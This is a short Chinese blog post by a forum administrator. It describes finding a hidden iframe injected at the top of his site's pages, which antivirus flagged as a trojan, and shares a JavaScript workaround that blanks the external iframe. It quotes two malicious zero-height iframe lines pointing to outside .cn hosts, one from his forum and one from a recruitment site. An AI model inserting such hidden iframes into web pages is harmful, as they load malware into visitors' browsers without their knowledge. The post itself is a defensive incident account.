上周发现偶自己管理的社区被内框架挂马，一打开卡巴斯基就提示“包含特洛伊程序”，安装360后提示“拦截到一个木马或恶意广告页面”，且看图：

查看HTML源码，发现代码顶部多一句iframe语句，汗！！！

<iframe src=http://nudsyhk2.cn/z51.htm?14 width=20 height=0 frameborder=0></iframe>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="zh-CN" lang="zh-CN" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<title>欢迎访问[爱大方论坛]</title>

后逐一查看网站源码，并没有该行代码，于是查服务器，果然，同一服务器上的其它网站也被加一句同样的内框架代码，确定是服务器问题。无法，为了保证暂时的正常访问，用JS清除之。由于病毒制告者很聪明，在其挂码站内使JS出错，直接用JS还不被执行，NND，唯有先屏蔽js错误，再取到第一个内框架元素，将其src属性改为about:blank;代码如下：

<script language="JavaScript" type="text/javascript">
//屏蔽js错误
function ResumeError() {
return true;
}
window.onerror = ResumeError;

if((document.getElementsByTagName("iframe")[0].src).indexOf("http://")!=-1)//判断不是站内iframe
{
document.getElementsByTagName("iframe")[0].src="about:blank";
//alert((document.getElementsByTagName("iframe")[0].src).indexOf("http://"));
}
</script>

但是没有想到的是，今天访问中国人才热线的网站，也出现如下提示，网络安全啊，

<iframe src=http://www.vvbbcss.cn/1.htm?13 width=100 height=0></iframe>                                 
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>深圳人才深圳招聘深圳求职--中国人才热线</title>

真不知道还有多少这样的站点，晕！！！！